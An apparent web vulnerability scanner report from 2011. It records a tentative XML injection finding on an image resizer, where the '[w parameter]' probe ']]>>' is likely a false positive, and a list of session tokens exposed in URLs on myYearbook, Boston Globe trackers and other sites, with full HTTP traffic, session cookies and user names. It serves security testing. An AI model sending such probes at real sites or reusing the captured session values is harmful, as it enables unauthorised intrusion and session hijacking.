User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:14:51 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:14:51 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*.....    ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The w parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the w parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation. The same caveat as in 7.1 applies: the response is a JPEG of exactly the same length (141,832 bytes), and the XML declaration the scanner matched is embedded image metadata, so the finding needs manual confirmation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244&w=436]]>>&c=1 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:15:41 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:15:40 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*.....    ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

8. Session token in URL
There are 20 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://assets.0.mybcdna.com
Path:   /JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /JavaScript/apps/HomeBeforeLogin/hblv2.js?68769 HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 16 Jun 2011 15:10:15 GMT
ETag: "2230425394"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 274737
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</p><img src="https://h.online-metrix.net/fp/clear.png?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '&m=2"alt=""><script src="https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"type="text/javascript"></script><object type="application/x-shockwave-flash"data="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"width="1"height="1"id="obj_id"><param name="movie"value="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"/>
...[SNIP]...

8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bostonglobe.tt.omtrdc.net
Path:   /m2/bostonglobe/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:48:14 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 168
Date: Sat, 23 Jul 2011 13:48:13 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

8.3. http://games.myyearbook.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://games.myyearbook.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; navbar-click=games

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:00:15 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:00:14 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 44747
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<div class="message">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/02/08/15/thm_phpKdbNWy.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5Nzk0MDA4">sam sam</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc="><img src="http://content1.myyearbook.com/thumb_userimages/mini/2009/07/07/16/thm_thm_phpUHyFBn.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTg5OTAzNjc=">Adrian,BIO,outlaw,ANR Theoret</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/06/29/18/thm_php2jwE4u.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIyMjA0NTY0">Liana Nicole</a>
...[SNIP]...
<td class="thumb"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3"><img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/08/19/thm_phpNnlsgm.jpg"/>
...[SNIP]...
<td class="details" style="clear:"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTExMTM2MjY3">tera for you to ask</a>
...[SNIP]...

8.4. http://games.myyearbook.com/landing/pool

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://games.myyearbook.com
Path:   /landing/pool

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /landing/pool HTTP/1.1
Host: games.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1; scorecardresearch=1964828935-258875400-1311271308286

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:41:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; path=/; domain=.myyearbook.com
Set-Cookie: mcim=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Wed, 21-Nov-3010 18:41:29 GMT; path=/; domain=.myyearbook.com
Set-Cookie: navbar-click=deleted; expires=Wed, 21-Jul-2010 18:41:28 GMT; path=/; domain=.myyearbook.com
Cache-control: no-cache
Pragma: no-cache
Content-Length: 60975
Connection: close
Content-Type: text/html; charset=UTF-8;
X-MyPoolMember: 10.10.10.239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2002/REC-xhtml1-20020801/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/
...[SNIP]...
<li class="profileMenu" data-id="profile">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGU=">
Profile
</a>
...[SNIP]...
<li id="reportIcon" class="headerSprite" data-id="reportabuse">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ19ib2d1cw==">
Report
</a>
...[SNIP]...
<li data-id="signup">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">Sign Up</a>
...[SNIP]...
<li data-id="login"><a href="http://www.myyearbook.com//?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">Login</a>
...[SNIP]...
<li data-id="browsepeople">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QkFTSUMmZmlyc3RwYWdlPXk=">
Browse People
</a>
...[SNIP]...
<li data-id="namesearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPU5BTUU=">
Name Search
</a>
...[SNIP]...
<li data-id="emailsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPUVNQUlM">
Email Search
</a>
...[SNIP]...
<li data-id="schoolsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaCZzZWFyY2h0eXBlPVlFQVJCT09L">
School Search
</a>
...[SNIP]...
<li data-id="advancedsearch">
<a href="http://www.myyearbook.com/?mysession=c2VhcmNoX3NlYXJjaF9yZXN1bHRzX2FkdmFuY2VkJnNlYXJjaHR5cGU9QURWQU5DRUQmZmlyc3RwYWdlPXk=">
Advanced Search
</a>
...[SNIP]...
<li data-id="myphotos">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX215cGljdHVyZXM=">
My Photos
</a>
...[SNIP]...
<li data-id="myautographs">
<a href="http://www.myyearbook.com/?mysession=bGlzdGluZ192aWV3X2F1dG9ncmFwaHM=">
My Autographs
</a>
...[SNIP]...
<li data-id="mystickers">
<a href="http://www.myyearbook.com/?mysession=c3RpY2tlcnNfdmlld2FsbHN0aWNrZXJz=">
My Stickers
</a>
...[SNIP]...
<li data-id="myflirts">
<a href="http://www.myyearbook.com/?mysession=ZmxpcnRzX3ZpZXdGbGlydHM=">
My Flirts
</a>
...[SNIP]...
<li data-id="whateveriwant">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3doYXRldmVyaXdhbnQ=">
Whatever I Want
</a>
...[SNIP]...
<li data-id="myvideos">
<a href="http://www.myyearbook.com/?mysession=dmlkZW9fdXNlcg==">
My Videos
</a>
...[SNIP]...
<li data-id="myblog">
<a href="http://www.myyearbook.com/?mysession=YmxvZ3NfYmxvZw==">
My Blog
</a>
...[SNIP]...
<li class="navbar_battles" data-id="battles"><a href="http://www.myyearbook.com/?mysession=YmF0dGxlc192b3RlX2JhdHRsZQ==">Battles</a></li><li class="navbar_mymag" data-id="mymag"><a href="http://www.myyearbook.com/?mysession=bWFnX2luZGV4">myMag</a>
...[SNIP]...
<td valign="middle">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">
<img class="photo" style="padding-right:8px;" src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/06/thm_phpFMLQAm.jpg"/>
...[SNIP]...
<td class="details123">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjkwMzAy">mark streeter</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/17/23/thm_phpW7Vrvq.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MjgxODc0">Ms. Janine</a>
...[SNIP]...
<td>
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">
<img src="http://content1.myyearbook.com/thumb_userimages/mini/2011/07/18/02/thm_phplc5T9V.jpg"/>
...[SNIP]...
<div class="container">
<a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzM2MDAy">Alyssa Ash</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTY4MTQ3MTI=">*~Teena Ann~*</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI5NzEyMDg3">perley murray</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI0OTU3Mjgx">Mike A</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM1MDcxMTUx">kylee masterson</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTE4ODI4Njgz">MC B Baby :P</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEyOTA2ODAw">andy zenitram</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTEzNzcwNjc5">JeanPaul Sollars</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMwMjc3ODk4">Ian m</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NDU3MDgz">Doc Harshman</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzMjQ2NzQx">Jas..n ...ruck ...anati...&amp;#123;Doesnt Vote&amp;#125;o=0~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzOTA4NjIz">000~Yasmin~ Yasmin~</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIwNDY4NTU=">O.C.-Ztyle 713</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTI1NjQ2MjU4">Tim Boylen</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0ODkwOTY1">Roy Perry</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MzQzMzQ5">James Crachiolo</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNTUyMDQx">SKULLY LIVES</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzNDIxOTUz">Govind Saini</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIzNTI5MDI2">glenn tan</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMzOTEyNzk2">Geo M</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTIxMjM2NDcy">Gary leftrook</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTM0MDA3Mzgw">donna santos</a>
...[SNIP]...
<div class="userName"><a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3Byb2ZpbGUmdXNlcmlkPTMyNDcyMTEy">Julie Gonzalez</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...
<td colspan="2" class="logged_out">To enjoy some of the benefits of Games, you must be registered with myYearbook. Please <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0w">register</a> or <a href="http://www.myyearbook.com/?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0x">log in</a>
...[SNIP]...

8.5. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=218be740-0231-4c2d-8b14-b2efe5b83b72&hostname=www.uscgnews.com&location=%2Fgo%2Fdoc%2F786%2F1135035%2F&url=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&sessionID=1311370085431.55259&fpc=e9b43fc-13153bf8437-16a3dde3-1&ts1311370085768.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 22 Jul 2011 21:27:59 GMT
Connection: keep-alive


8.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fconsultants-locator.apple.com%2Findex.php%3Ffuseaction%3Dhome.directory%26offset%3D0%26rppg%3D8%26q%3D10010&callback=_xdc_._74pqj6&token=51515 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
